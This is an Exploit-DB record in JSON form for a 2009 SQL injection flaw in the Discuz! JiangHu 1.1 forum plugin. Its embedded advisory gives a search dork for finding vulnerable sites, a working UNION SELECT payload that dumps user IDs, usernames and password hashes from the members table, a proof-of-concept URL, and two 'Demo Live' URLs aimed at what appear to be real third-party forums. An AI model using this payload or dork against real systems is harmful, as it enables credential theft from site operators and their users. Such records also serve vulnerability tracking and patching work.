{"id": "EDB-ID:9576", "vendorId": null, "type": "exploitdb", "bulletinFamily": "exploit", "title": "Discuz! Plugin JiangHu 1.1 - 'id' SQL Injection", "description": "", "published": "2009-09-02T00:00:00", "modified": "2009-09-02T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://www.exploit-db.com/exploits/9576", "reporter": "ZhaoHuAn", "references": [], "cvelist": ["2009-4621"], "immutableFields": [], "lastseen": "2022-01-13T06:59:48", "viewCount": 19, "enchantments": {"dependencies": {}, "score": {"value": 0.7, "vector": "NONE"}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.7}, "sourceHref": "https://www.exploit-db.com/download/9576", "sourceData": "=========================================================\r\nDiscuz! Plugin JiangHu <= 1.1 Sql injection Vulnerability\r\n=========================================================\r\n\r\n========================[Author]========================= \r\n\r\n [+] Founded \t: ZhaoHuAn\t\t\t\t \r\n [+] Contact\t: ZhengXing[at]shandagames[dot]com\t \r\n [+] Blog\t: http://www.patching.net/zhaohuan/\t \r\n [+] Date\t: Feb, 9th 2009\t \r\n [+] Update\t: Sep, 1th 2009\t\r\n\t\t\t\t\t\t\t\t \r\n========================[Soft Info]======================\t\t \r\n\t\t\t\t\t\t\t\t \r\nSoftware: Discuz! Plugin JiangHu Inn\t\t \r\nVersion\t: 1.1\t\t\t\t\t \r\nVendor\t: http://www.discuz.com\r\nd0rk : inurl:forummission.php\t\t\t \t \r\n\r\n\r\n\r\n[-] Exploit:\r\n[+] and+1=2+union+select+1,2,group_concat(uid,0x3a,username,0x3a,password),4,5,6,7,8,9,10,11 from cdb_members--\r\n\r\n[-] SqlI PoC:\r\n[+] http://target/[path]/forummission.php?index=show&id=24 and+1=2+union+select+1,2,group_concat(uid,0x3a,username,0x3a,password),4,5,6,7,8,9,10,11 from cdb_members--\r\n\r\n[+] Demo Live:\r\n[-] http://www.palslp.com/forummission.php?index=show&id=24 and+1=2+union+select+1,2,group_concat(uid,0x3a,username,0x3a,password),4,5,6,7,8,9,10,11 from cdb_members--\r\n\r\n[-] http://bbs.sunspals.com/forummission.php?index=show&id=24 and+1=2+union+select+1,2,group_concat(uid,0x3a,username,0x3a,password),4,5,6,7,8,9,10,11 from cdb_members--\r\n\r\n\r\n/---------------------------------------------www.zhaohuan.net-------------------------------------------------\\ \r\n\r\n Greetz : Snda Security Team\r\n & Normal is boring - -!\r\n\r\n\\--------------------------------------------------------------------------------------------------------------/\r\n\r\n# milw0rm.com [2009-09-02]", "osvdbidlist": ["61855"], "exploitType": "webapps", "verified": true, "_state": {"dependencies": 1645426381}}